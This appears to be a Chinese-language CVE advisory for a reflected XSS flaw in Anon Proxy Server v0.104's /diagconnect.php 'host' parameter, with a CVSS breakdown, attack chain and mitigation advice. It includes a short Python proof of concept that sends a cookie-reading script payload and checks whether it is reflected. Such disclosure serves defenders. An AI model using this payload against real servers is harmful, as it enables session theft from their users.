CVE-2025-41356 CVSS 6.1 中危

CVE-2025-41356 Anon Proxy Server反射型XSS漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-41356

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Anon Proxy Server

漏洞概述

Anon Proxy Server v0.104版本中存在反射型跨站脚本（XSS）漏洞。该漏洞源于'/diagconnect.php'端点的'host'参数未能正确过滤用户输入。攻击者可诱导受害者访问包含恶意脚本的链接，从而在受害者浏览器中执行任意JavaScript代码，进而窃取会话Cookie等敏感数据或冒充用户执行操作。

技术细节

该漏洞属于反射型XSS（Reflected XSS）。在Anon Proxy Server的'/diagconnect.php'页面处理逻辑中，对'host'参数的值直接输出到HTTP响应页面中，未进行有效的HTML实体编码或输入验证。当攻击者构造特定的Payload（例如<script>alert(1)</script>）作为'host'参数的值发送给服务器时，服务器会将该恶意脚本反射回浏览器。由于浏览器将其解析为HTML/JS执行，且攻击向量为网络（AV:N），无需认证（PR:N），攻击者只需通过社会工程学手段诱导用户点击链接，即可利用该漏洞。利用范围涉及机密性（C:L）和完整性（I:L），攻击者可借此窃取用户凭证或进行恶意操作。

攻击链分析

STEP 1

侦察

攻击者识别目标服务器运行的是Anon Proxy Server v0.104版本。

STEP 2

构造Payload

攻击者构造包含恶意JavaScript代码的URL，利用'host'参数传递XSS Payload。

STEP 3

社会工程学

攻击者通过钓鱼邮件或其他方式诱导受害者点击包含恶意Payload的链接。

STEP 4

执行攻击

受害者浏览器请求服务器，服务器将未经过滤的Payload反射回页面，浏览器解析并执行恶意脚本。

STEP 5

达成目标

恶意脚本窃取受害者的Session Cookie或执行其他未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2025-41356
# Target: Anon Proxy Server v0.104
# Endpoint: /diagconnect.php

import requests

target_url = "http://target-ip/diagconnect.php"
# Malicious payload to execute JavaScript
payload = "<script>alert(document.cookie)</script>"

# Sending the request with the vulnerable parameter
response = requests.get(target_url, params={"host": payload})

# Check if the payload is reflected unescaped
if payload in response.text:
    print("Vulnerability confirmed!")
else:
    print("Vulnerability not found.")

影响范围

Anon Proxy Server 0.104

防御指南

临时缓解措施

建议立即升级Anon Proxy Server至修复了该漏洞的最新版本。如果暂时无法升级，应在Web服务器前端部署WAF（Web应用防火墙），对'/diagconnect.php'接口的'host'参数进行过滤，拦截包含常见XSS特征字符（如<, >, script等）的请求流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表